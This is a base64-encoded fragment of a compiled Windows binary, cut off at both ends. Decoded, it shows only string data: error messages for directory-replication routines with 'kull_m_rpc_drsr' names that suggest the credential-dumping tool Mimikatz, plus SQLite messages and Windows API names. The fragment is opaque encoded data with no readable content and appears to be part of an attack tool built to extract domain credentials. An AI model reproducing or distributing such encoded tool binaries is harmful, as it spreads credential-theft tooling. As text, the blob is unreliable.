QBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABvAG0AYQBpAG4AQQBuAGQAVQBzAGUAcgBJAG4AZgBvAHMAIAA7ACAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcgBJAG4AZgBvADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAG8AbQBhAGkAbgBBAG4AZABVAHMAZQByAEkAbgBmAG8AcwAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABDAEIAaQBuAGQAIAA7ACAASQBuAGMAbwByAHIAZQBjAHQAIABEAFIAUwAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAIABPAHUAdABwAHUAdAAgACgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAQwBCAGkAbgBkACAAOwAgAEkAbgBjAG8AcgByAGUAYwB0ACAARABSAFMAIABFAHgAdABlAG4AcwBpAG8AbgBzACAATwB1AHQAcAB1AHQAIABTAGkAegBlACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAEMAQgBpAG4AZAAgADsAIABOAG8AIABEAFIAUwAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAIABPAHUAdABwAHUAdAAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAQwBCAGkAbgBkACAAOwAgAEkARABMAF8ARABSAFMAQgBpAG4AZAA6ACAAJQB1AAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAEMAQgBpAG4AZAAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAABOAE8AXwBFAFIAUgBPAFIAAAAAAAAAAABFAFIAUgBPAFIAXwBSAEUAUwBPAEwAVgBJAE4ARwAAAEUAUgBSAE8AUgBfAE4ATwBUAF8ARgBPAFUATgBEAAAARQBSAFIATwBSAF8ATgBPAFQAXwBVAE4ASQBRAFUARQAAAAAAAAAAAEUAUgBSAE8AUgBfAE4ATwBfAE0AQQBQAFAASQBOAEcAAAAAAAAAAABFAFIAUgBPAFIAXwBEAE8ATQBBAEkATgBfAE8ATgBMAFkAAAAAAAAARQBSAFIATwBSAF8ATgBPAF8AUwBZAE4AVABBAEMAVABJAEMAQQBMAF8ATQBBAFAAUABJAE4ARwAAAAAAAAAAAEUAUgBSAE8AUgBfAFQAUgBVAFMAVABfAFIARQBGAEUAUgBSAEEATAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AQwByAGEAYwBrAE4AYQBtAGUAIAA7ACAAQwByAGEAYwBrAE4AYQBtAGUAcwAgACgAbgBhAG0AZQAgAHMAdABhAHQAdQBzACkAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAgAC0AIAAlAHMACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAEMAcgBhAGMAawBOAGEAbQBlACAAOwAgAEMAcgBhAGMAawBOAGEAbQBlAHMAOgAgAG4AbwAgAGkAdABlAG0AIQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBDAHIAYQBjAGsATgBhAG0AZQAgADsAIABDAHIAYQBjAGsATgBhAG0AZQBzADoAIABiAGEAZAAgAHYAZQByAHMAaQBvAG4AIAAoACUAdQApAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAEMAcgBhAGMAawBOAGEAbQBlACAAOwAgAEMAcgBhAGMAawBOAGEAbQBlAHMAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AQwByAGEAYwBrAE4AYQBtAGUAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAQwBoAGUAYwBrAHMAdQBtAHMAIABkAG8AbgAnAHQAIABtAGEAdABjAGgAIAAoAEMAOgAwAHgAJQAwADgAeAAgAC0AIABSADoAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUAByAG8AYwBlAHMAcwBHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwBSAGUAcABsAHkAXwBkAGUAYwByAHkAcAB0ACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAYwBhAGwAYwB1AGwAYQB0AGUAIABDAFIAQwAzADIACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAUgB0AGwARQBuAGMAcgB5AHAAdABEAGUAYwByAHkAcAB0AFIAQwA0AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUAByAG8AYwBlAHMAcwBHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwBSAGUAcABsAHkAXwBkAGUAYwByAHkAcAB0ACAAOwAgAE4AbwAgAHYAYQBsAGkAZAAgAGQAYQB0AGEACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUAByAG8AYwBlAHMAcwBHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwBSAGUAcABsAHkAXwBkAGUAYwByAHkAcAB0ACAAOwAgAE4AbwAgAFMAZQBzAHMAaQBvAG4AIABLAGUAeQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGYAcgBlAGUAXwBEAFIAUwBfAE0AUwBHAF8AQwBSAEEAQwBLAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAbgBhAG0AZQBDAHIAYQBjAGsATwB1AHQAVgBlAHIAcwBpAG8AbgAgAG4AbwB0ACAAdgBhAGwAaQBkACAAKAAwAHgAJQAwADgAeAAgAC0AIAAlAHUAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBmAHIAZQBlAF8ARABSAFMAXwBNAFMARwBfAEQAQwBJAE4ARgBPAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAVABPAEQATwAgACgAbQBhAHkAYgBlAD8AKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBmAHIAZQBlAF8ARABSAFMAXwBNAFMARwBfAEQAQwBJAE4ARgBPAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAZABjAE8AdQB0AFYAZQByAHMAaQBvAG4AIABuAG8AdAAgAHYAYQBsAGkAZAAgACgAMAB4ACUAMAA4AHgAIAAtACAAJQB1ACkACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBmAHIAZQBlAF8ARABSAFMAXwBNAFMARwBfAEcARQBUAEMASABHAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAVABPAEQATwAgACgAbQBhAHkAYgBlAD8AKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBmAHIAZQBlAF8ARABSAFMAXwBNAFMARwBfAEcARQBUAEMASABHAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAZAB3AE8AdQB0AFYAZQByAHMAaQBvAG4AIABuAG8AdAAgAHYAYQBsAGkAZAAgACgAMAB4ACUAMAA4AHgAIAAtACAAJQB1ACkACgAAAFMAZQByAHYAaQBjAGUAcwBBAGMAdABpAHYAZQAAAAAAJQB3AFoAAAAlADAAMgB4AAAAAAAAAAAAJQAwADIAeAAgAAAAAAAAADAAeAAlADAAMgB4ACwAIAAAAAAAAAAAAFwAeAAlADAAMgB4AAAAAAAKAEIAWQBUAEUAIABkAGEAdABhAFsAXQAgAD0AIAB7AAoACQAAAAAACQAAAAAAAAAKAH0AOwAKAAAAAAAAAAAAJQBzACAAAAAlAHMAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBzAHQAcgBpAG4AZwBfAGQAaQBzAHAAbABhAHkAUwBJAEQAIAA7ACAAQwBvAG4AdgBlAHIAdABTAGkAZABUAG8AUwB0AHIAaQBuAGcAUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAFUAcwBlAHIAAAAAAAAAAABHAHIAbwB1AHAAAAAAAAAARABvAG0AYQBpAG4AAAAAAEEAbABpAGEAcwAAAAAAAABXAGUAbABsAEsAbgBvAHcAbgBHAHIAbwB1AHAAAAAAAEQAZQBsAGUAdABlAGQAQQBjAGMAbwB1AG4AdAAAAAAASQBuAHYAYQBsAGkAZAAAAFUAbgBrAG4AbwB3AG4AAABDAG8AbQBwAHUAdABlAHIAAAAAAAAAAABMAGEAYgBlAGwAAAAAAAAAdQBuAGsAIQAAAAAAAAAAAFQAbwBrAGUAbgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHgAbQBsAF8AQwByAGUAYQB0AGUAQQBuAGQASQBuAGkAdABEAE8ATQAgADsAIABDAG8AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AeABtAGwAXwBMAG8AYQBkAFgATQBMAEYAaQBsAGUAIAA7ACAASQBYAE0ATABEAE8ATQBEAG8AYwB1AG0AZQBuAHQAXwBsAG8AYQBkADoAIAAwAHgAJQAwADgAeAAKAAAAAAAwAAAAMQAAAAAAAAAlSDolTTolUwAAAAAAAAAAY3VycmVudF90aW1lAAAAACVZLSVtLSVkAAAAAAAAAABjdXJyZW50X2RhdGUAAAAAJVktJW0tJWQgJUg6JU06JVMAAAAAAAAAY3VycmVudF90aW1lc3RhbXAAAAAAAAAAZmFpbGVkIHRvIGFsbG9jYXRlICV1IGJ5dGVzIG9mIG1lbW9yeQAAAGZhaWxlZCBtZW1vcnkgcmVzaXplICV1IHRvICV1IGJ5dGVzACUAAABOVUxMAAAAAChOVUxMKQAALgAAAAAAAAA5MjIzMzcyMDM2ODU0Nzc1ODAAAAAAAABBUEkgY2FsbCB3aXRoICVzIGRhdGFiYXNlIGNvbm5lY3Rpb24gcG9pbnRlcgAAAAB1bm9wZW5lZAAAAAAAAAAAaW52YWxpZABBcmVGaWxlQXBpc0FOU0kAQ2hhckxvd2VyVwAAAAAAAENoYXJVcHBlclcAAAAAAABDbG9zZUhhbmRsZQAAAAAAQ3JlYXRlRmlsZUEAAAAAAENyZWF0ZUZpbGVXAAAAAABDcmVhdGVGaWxlTWFwcGluZ0EAAAAAAABDcmVhdGVGaWxlTWFwcGluZ1cAAAAAAABDcmVhdGVNdXRleFcAAAAARGVsZXRlRmlsZUEAAAAAAERlbGV0ZUZpbGVXAAAAAABGaWxlVGltZVRvTG9jYWxGaWxlVGltZQBGaWxlVGltZVRvU3lzdGVtVGltZQAAAABGbHVzaEZpbGVCdWZmZXJzAAAAAAAAAABGb3JtYXRNZXNzYWdlQQAARm9ybWF0TWVzc2FnZVcAAEZyZWVMaWJyYXJ5AAAAAABHZXRDdXJyZW50UHJvY2Vzc0lkAAAAAABHZXREaXNrRnJlZVNwYWNlQQAAAAAAAABHZXREaXNrRnJlZVNwYWNlVwAAAAAAAABHZXRGaWxlQXR0cmlidXRlc0EAAAAAAABHZXRGaWxlQXR0cmlidXRlc1cAAAAAAABHZXRGaWxlQXR0cmlidXRlc0V4VwAAAABHZXRGaWxlU2l6ZQAAAAAAR2V0RnVsbFBhdGhOYW1lQQAAAAAAAAAAR2V0RnVsbFBhdGhOYW1lVwAAAAAAAAAAR2V0TGFzdEVycm9yAAAAAEdldFByb2NBZGRyZXNzQQBHZXRTeXN0ZW1JbmZvAAAAR2V0U3lzdGVtVGltZQAAAEdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAEdldFRlbXBQYXRoQQAAAABHZXRUZW1wUGF0aFcAAAAAR2V0VGlja0NvdW50AAAAAEdldFZlcnNpb25FeEEAAABHZXRWZXJzaW9uRXhXAAAASGVhcEFsbG9jAAAAAAAAAEhlYXBDcmVhdGUAAAAAAABIZWFwRGVzdHJveQAAAAAASGVhcEZyZWUAAAAAAAAAAEhlYXBSZUFsbG9jAAAAAABIZWFwU2l6ZQAAAAAAAAAASGVhcFZhbGlkYXRlAAAAAEhlYXBDb21wYWN0AAAAAABMb2FkTGlicmFyeUEAAAAATG9hZExpYnJhcnlXAAAAAExvY2FsRnJlZQAAAAAAAABMb2NrRmlsZQAAAAAAAAAATG9ja0ZpbGVFeAAAAAAAAE1hcFZpZXdPZkZpbGUAAABNdWx0aUJ5dGVUb1dpZGVDaGFyAAAAAABRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgBSZWFkRmlsZQAAAAAAAAAAU2V0RW5kT2ZGaWxlAAAAAFNldEZpbGVQb2ludGVyAABTbGVlcAAAAFN5c3RlbVRpbWVUb0ZpbGVUaW1lAAAAAFVubG9ja0ZpbGUAAAAAAABVbmxvY2tGaWxlRXgAAAAAVW5tYXBWaWV3T2ZGaWxlAFdpZGVDaGFyVG9NdWx0aUJ5dGUAAAAAAFdyaXRlRmlsZQAAAAAAAABDcmVhdGVFdmVudEV4VwAAV2FpdEZvclNpbmdsZU9iamVjdAAAAAAAV2FpdEZvclNpbmdsZU9iamVjdEV4AAAAU2V0RmlsZVBvaW50ZXJFeAAAAAAAAAAAR2V0RmlsZUluZm9ybWF0aW9uQnlIYW5kbGVFeAAAAABNYXBWaWV3T2ZGaWxlRnJvbUFwcAAAAABDcmVhdGVGaWxlMgAAAAAATG9hZFBhY2thZ2VkTGlicmFyeQAAAAAAR2V0VGlja0NvdW50NjQAAEdldE5hdGl2ZVN5c3RlbUluZm8AAAAAAE91dHB1dERlYnVnU3RyaW5nQQAAAAAAAE91dHB1dERlYnVnU3RyaW5nVwAAAAAAAEdldFByb2Nlc3NIZWFwAABDcmVhdGVGaWxlTWFwcGluZ0Zyb21BcHAAAAAAAAAAAEludGVybG9ja2VkQ29tcGFyZUV4Y2hhbmdlAAAAAAAAVXVpZENyZWF0ZQAAAAAAAFV1aWRDcmVhdGVTZXF1ZW50aWFsAAAAAEZsdXNoVmlld09mRmlsZQBPc0Vycm9yIDB4JWx4ICglbHUpACVzAABvc193aW4uYzolZDogKCVsdSkgJXMoJXMpIC0gJXMAAGRlbGF5ZWQgJWRtcyBmb3IgbG9jay9zaGFyaW5nIGNvbmZsaWN0IGF0IGxpbmUgJWQAAAAAAAAAd2luU2Vla0ZpbGUAAAAAAHdpbkNsb3NlAAAAAAAAAAB3aW5SZWFkAHdpbldyaXRlMQAAAAAAAAB3aW5Xcml0ZTIAAAAAAAAAd2luVHJ1bmNhdGUxAAAAAHdpblRydW5jYXRlMgAAAAB3aW5TeW5jMQAAAAAAAAAAd2luU3luYzIAAAAAAAAAAHdpbkZpbGVTaXplAAAAAAB3aW5VbmxvY2tSZWFkTG9jawAAAAAAAAB3aW5VbmxvY2sAAAAAAAAAd2luVW5tYXBmaWxlMQAAAHdpblVubWFwZmlsZTIAAAB3aW5NYXBmaWxlMQAAAAAAd2luTWFwZmlsZTIAAAAAAGV0aWxxc18Ad2luR2V0VGVtcG5hbWUxAHdpbkdldFRlbXBuYW1lMgB3aW5HZXRUZW1wbmFtZTMAd2luR2V0VGVtcG5hbWU0AHdpbkdldFRlbXBuYW1lNQB3aW5PcGVuAHBzb3cAAAAAd2luRGVsZXRlAAAAAAAAAHdpbkFjY2VzcwAAACVzJWMlcwAAAAAAAHdpbkZ1bGxQYXRobmFtZTEAAAAAAAAAAHdpbkZ1bGxQYXRobmFtZTIAAAAAAAAAAHdpbkZ1bGxQYXRobmFtZTMAAAAAAAAAAHdpbkZ1bGxQYXRobmFtZTQAAAAAd2luMzIAAAAAAAAAd2luMzItbG9uZ3BhdGgAAHJlY292ZXJlZCAlZCBwYWdlcyBmcm9tICVzAAAAAAAALWpvdXJuYWwAAAAAbm9sb2NrAAAAAAAAaW1tdXRhYmxlAAAAQCAgAG91dCBvZiBtZW1vcnkAAAAlbGxkAAAAACUhLjE1ZwAALQAAACVzJXMAAAAAAAAAACVzLW1qWFhYWFhYOVhYegBNSiBkZWxldGU6ICVzAAAATUogY29sbGlkZTogJXMAAC1taiUwNlg5JTAyWAAAAABBUEkgY2FsbGVkIHdpdGggZmluYWxpemVkIHByZXBhcmVkIHN0YXRlbWVudAAAAABBUEkgY2FsbGVkIHdpdGggTlVMTCBwcmVwYXJlZCBzdGF0ZW1lbnQAc3RyaW5nIG9yIGJsb2IgdG9vIGJpZwAAdW5hYmxlIHRvIHVzZSBmdW5jdGlvbiAlcyBpbiB0aGUgcmVxdWVzdGVkIGNvbnRleHQAAAAAAABiaW5kIG9uIGEgYnVzeSBwcmVwYXJlZCBzdGF0ZW1lbnQ6IFslc10ATk9UIE5VTEwAAAAAVU5JUVVFAABDSEVDSwAAAAAAAABGT1JFSUdOIEtFWQAAAAAAJXMgY29uc3RyYWludCBmYWlsZWQAAAAAJXo6ICVzAABhYm9ydCBhdCAlZCBpbiBbJXNdOiAlcwBjYW5ub3Qgb3BlbiBzYXZlcG9pbnQgLSBTUUwgc3RhdGVtZW50cyBpbiBwcm9ncmVzcwAAAAAAAG5vIHN1Y2ggc2F2ZXBvaW50OiAlcwAAAGNhbm5vdCByZWxlYXNlIHNhdmVwb2ludCAtIFNRTCBzdGF0ZW1lbnRzIGluIHByb2dyZXNzAAAAY2Fubm90IGNvbW1pdCB0cmFuc2FjdGlvbiAtIFNRTCBzdGF0ZW1lbnRzIGluIHByb2dyZXNzAABjYW5ub3Qgc3RhcnQgYSB0cmFuc2FjdGlvbiB3aXRoaW4gYSB0cmFuc2FjdGlvbgBjYW5ub3Qgcm9sbGJhY2sgLSBubyB0cmFuc2FjdGlvbiBpcyBhY3RpdmUAAAAAAABjYW5ub3QgY29tbWl0IC0gbm8gdHJhbnNhY3Rpb24gaXMgYWN0aXZlAAAAAAAAAABkYXRhYmFzZSBzY2hlbWEgaGFzIGNoYW5nZWQAAAAAAHNxbGl0ZV9tYXN0ZXIAAAAAAAAAAAAAAFNFTEVDVCBuYW1lLCByb290cGFnZSwgc3FsIEZST00gJyVxJy4lcyBXSEVSRSAlcyBPUkRFUiBCWSByb3dpZABzdGF0ZW1lbnQgYWJvcnRzIGF0ICVkOiBbJXNdICVzAG1pc3VzZSBvZiBhbGlhc2VkIGFnZ3JlZ2F0ZSAlcwAAbm8gc3VjaCBjb2x1bW4AAGFtYmlndW91cyBjb2x1bW4gbmFtZQAAACVzOiAlcy4lcy4lcwAAAAAlczogJXMuJXMAAAAlczogJXMAAAAAAABwYXJ0aWFsIGluZGV4IFdIRVJFIGNsYXVzZXMAAAAAAGluZGV4IGV4cHJlc3Npb25zAAAAAAAAACVzIHByb2hpYml0ZWQgaW4gJXMAAAAAAHRoZSAiLiIgb3BlcmF0b3IAAAAAAAAAAGZ1bmN0aW9ucwAAAAAAAAAAAAAAAAAAAHNlY29uZCBhcmd1bWVudCB0byBsaWtlbGlob29kKCkgbXVzdCBiZSBhIGNvbnN0YW50IGJldHdlZW4gMC4wIGFuZCAxLjAAAG5vbi1kZXRlcm1pbmlzdGljIGZ1bmN0aW9ucwAAAAAAbWlzdXNlIG9mIGFnZ3JlZ2F0ZSBmdW5jdGlvbiAlLipzKCkAAAAAAG5vIHN1Y2ggZnVuY3Rpb246ICUuKnMAAHdyb25nIG51bWJlciBvZiBhcmd1bWVudHMgdG8gZnVuY3Rpb24gJS4qcygpAAAAAHN1YnF1ZXJpZXMAAAAAAABwYXJhbWV0ZXJzAAAAAAAAJXIgJXMgQlkgdGVybSBvdXQgb2YgcmFuZ2UgLSBzaG91bGQgYmUgYmV0d2VlbiAxIGFuZCAlZAB0b28gbWFueSB0ZXJtcyBpbiBPUkRFUiBCWSBjbGF1c2UAAABPUkRFUgAAAAAAAAAlciBPUkRFUiBCWSB0ZXJtIGRvZXMgbm90IG1hdGNoIGFueSBjb2x1bW4gaW4gdGhlIHJlc3VsdCBzZXQAAAAAdG9vIG1hbnkgdGVybXMgaW4gJXMgQlkgY2xhdXNlAABhIEdST1VQIEJZIGNsYXVzZSBpcyByZXF1aXJlZCBiZWZvcmUgSEFWSU5HAEdST1VQAAAAAAAAAGFnZ3JlZ2F0ZSBmdW5jdGlvbnMgYXJlIG5vdCBhbGxvd2VkIGluIHRoZSBHUk9VUCBCWSBjbGF1c2UAAAAAAABFeHByZXNzaW9uIHRyZWUgaXMgdG9vIGxhcmdlIChtYXhpbXVtIGRlcHRoICVkKQB2YXJpYWJsZSBudW1iZXIgbXVzdCBiZSBiZXR3ZWVuID8xIGFuZCA/JWQAAAAAAAB0b28gbWFueSBTUUwgdmFyaWFibGVzAAB0b28gbWFueSBjb2x1bW5zIGluICVzAABfUk9XSURfAFJPV0lEAAAAT0lEAAAAAABvdmVyc2l6ZWQgaW50ZWdlcjogJXMlcwBtaXN1c2Ugb2YgYWdncmVnYXRlOiAlcygpAAAAAAAAAHVua25vd24gZnVuY3Rpb246ICVzKCkAACVzICVUIGNhbm5vdCByZWZlcmVuY2Ugb2JqZWN0cyBpbiBkYXRhYmFzZSAlcwAAAG5vIHN1Y2ggdGFibGUAAABjb3JydXB0IGRhdGFiYXNlAAAAAAAAAAB1bmtub3duIGRhdGFiYXNlICVUAAAAAABzcWxpdGVfAG9iamVjdCBuYW1lIHJlc2VydmVkIGZvciBpbnRlcm5hbCB1c2U6ICVzAAAAAAAAAHRhYmxlICVUIGFscmVhZHkgZXhpc3RzAHRoZXJlIGlzIGFscmVhZHkgYW4gaW5kZXggbmFtZWQgJXMAAAAAAAB0b28gbWFueSBjb2x1bW5zIG9uICVzAABkdXBsaWNhdGUgY29sdW1uIG5hbWU6ICVzAAAAAAAAAGRlZmF1bHQgdmFsdWUgb2YgY29sdW1uIFslc10gaXMgbm90IGNvbnN0YW50AAAAAHRhYmxlICIlcyIgaGFzIG1vcmUgdGhhbiBvbmUgcHJpbWFyeSBrZXkAAAAAAAAAAElOVEVHRVIALAAAACkAAAAKICAALAogIAAAAAAKKQAAQ1JFQVRFIFRBQkxFIAAAACBURVhUAAAAIE5VTQAAAAAgSU5UAAAAACBSRUFMAAAAQVVUT0lOQ1JFTUVOVCBub3QgYWxsb3dlZCBvbiBXSVRIT1VUIFJPV0lEIHRhYmxlcwAAAAAAAABQUklNQVJZIEtFWSBtaXNzaW5nIG9uIHRhYmxlICVzAHRhYmxlAAAAVEFCTEUAAABDUkVBVEUgJXMgJS4qcwAAAAAAAAAAAABVUERBVEUgJVEuJXMgU0VUIHR5cGU9JyVzJywgbmFtZT0lUSwgdGJsX25hbWU9JVEsIHJvb3RwYWdlPSMlZCwgc3FsPSVRIFdIRVJFIHJvd2lkPSMlZAAAdGJsX25hbWU9JyVxJyBBTkQgdHlwZSE9J3RyaWdnZXInAAAAAAAAAHNxbGl0ZV9zdGF0JWQAAABERUxFVEUgRlJPTSAlUS4lcyBXSEVSRSAlcz0lUQAAAERFTEVURSBGUk9NICVRLiVzIFdIRVJFIHRibF9uYW1lPSVRIGFuZCB0eXBlIT0ndHJpZ2dlcicAc3FsaXRlX3N0YXQAAAAAAHRhYmxlICVzIG1heSBub3QgYmUgZHJvcHBlZAB0YmwAaW5kZXgAAABjYW5ub3QgY3JlYXRlIGEgVEVNUCBpbmRleCBvbiBub24tVEVNUCB0YWJsZSAiJXMiAAAAAAAAAGFsdGVydGFiXwAAAAAAAAB0YWJsZSAlcyBtYXkgbm90IGJlIGluZGV4ZWQAAAAAAHRoZXJlIGlzIGFscmVhZHkgYSB0YWJsZSBuYW1lZCAlcwAAAAAAAABpbmRleCAlcyBhbHJlYWR5IGV4aXN0cwBzcWxpdGVfYXV0b2luZGV4XyVzXyVkAABleHByZXNzaW9ucyBwcm9oaWJpdGVkIGluIFBSSU1BUlkgS0VZIGFuZCBVTklRVUUgY29uc3RyYWludHMAAAAAY29uZmxpY3RpbmcgT04gQ09ORkxJQ1QgY2xhdXNlcyBzcGVjaWZpZWQAAAAAAAAAIFVOSVFVRQBDUkVBVEUlcyBJTkRFWCAlLipzAAAAAABJTlNFUlQgSU5UTyAlUS4lcyBWQUxVRVMoJ2luZGV4JywlUSwlUSwjJWQsJVEpOwBuYW1lPSclcScgQU5EIHR5cGU9J2luZGV4JwAAAAAAAG5vIHN1Y2ggaW5kZXg6ICVTAAAAAAAAAAAAAAAAAAAAaW5kZXggYXNzb2NpYXRlZCB3aXRoIFVOSVFVRSBvciBQUklNQVJZIEtFWSBjb25zdHJhaW50IGNhbm5vdCBiZSBkcm9wcGVkAAAAAAAAAABERUxFVEUgRlJPTSAlUS4lcyBXSEVSRSBuYW1lPSVRIEFORCB0eXBlPSdpbmRleCcAAAAAaWR4AE9OAABVU0lORwAAAAAAAABhIEpPSU4gY2xhdXNlIGlzIHJlcXVpcmVkIGJlZm9yZSAlcwAAAAAAaW5kZXggJyVxJwAALCAAACVzLiVzAAAAJXMucm93aWQAAAAAAAAAAGR1cGxpY2F0ZSBXSVRIIHRhYmxlIG5hbWU6ICVzAAAAbm8gc3VjaCBjb2xsYXRpb24gc2VxdWVuY2U6ICVzAAB0YWJsZSAlcyBtYXkgbm90IGJlIG1vZGlmaWVkAAAAAHJvd3MgZGVsZXRlZAAAAABpbnRlZ2VyAHRleHQAAAAAcmVhbAAAAABibG9iAAAAAG51bGwAAAAAaW50ZWdlciBvdmVyZmxvdwAAAAAAAAAATElLRSBvciBHTE9CIHBhdHRlcm4gdG9vIGNvbXBsZXgAAAAAAAAAAEVTQ0FQRSBleHByZXNzaW9uIG11c3QgYmUgYSBzaW5nbGUgY2hhcmFjdGVyAAAAACUhLjIwZQAAIAAAAE1BVENIAAAAbGlrZQAAAABnbG9iAAAAAAAAAAB1bmxpa2VseQAAAAAAAAAAbGlrZWxpaG9vZAAAbGlrZWx5AABsdHJpbQAAAHJ0cmltAAAAdHJpbQAAAABtaW4AbWF4AHR5cGVvZgAAbGVuZ3RoAABpbnN0cgAAAHByaW50ZgAAAAAAAHVuaWNvZGUAY2hhcgAAAABhYnMAdXBwZXIAAABsb3dlcgAAAGhleABpZm51bGwAAHJhbmRvbQAAcmFuZG9tYmxvYgAAbnVsbGlmAAAAAAAAc3FsaXRlX3ZlcnNpb24AAHNxbGl0ZV9zb3VyY2VfaWQAAAAAAAAAAHNxbGl0ZV9sb2cAAHF1b3RlAAAAAAAAAGxhc3RfaW5zZXJ0X3Jvd2lkAAAAAAAAAGNoYW5nZXMAdG90YWxfY2hhbmdlcwAAAHJlcGxhY2UAemVyb2Jsb2IAAAAAc3Vic3RyAABzdW0AdG90YWwAAABhdmcAY291bnQAAAAAAAAAZ3JvdXBfY29uY2F0AAAAAGNvYWxlc2NlAAAAAAAAAAB0YWJsZSAlUyBoYXMgbm8gY29sdW1uIG5hbWVkICVzAHRhYmxlICVTIGhhcyAlZCBjb2x1bW5zIGJ1dCAlZCB2YWx1ZXMgd2VyZSBzdXBwbGllZAAAAAAAJWQgdmFsdWVzIGZvciAlZCBjb2x1bW5zAAAAAAAAAAByb3dzIGluc2VydGVkAAAAYXV0b21hdGljIGV4dGVuc2lvbiBsb2FkaW5nIGZhaWxlZDogJXMAAD8AAAAAAAAAbWFsZm9ybWVkIGRhdGFiYXNlIHNjaGVtYSAoJXMpAAAleiAtICVzAGNyZWF0ZSAAaW52YWxpZCByb290cGFnZQAAAAAAAAAAAAAAAAAAAABDUkVBVEUgVEFCTEUgeCh0eXBlIHRleHQsbmFtZSB0ZXh0LHRibF9uYW1lIHRleHQscm9vdHBhZ2UgaW50ZWdlcixzcWwgdGV4dCkAAAAAAGF0dGFjaGVkIGRhdGFiYXNlcyBtdXN0IHVzZSB0aGUgc2FtZSB0ZXh0IGVuY29kaW5nIGFzIG1haW4gZGF0YWJhc2UAAAAAAHVuc3VwcG9ydGVkIGZpbGUgZm9ybWF0AF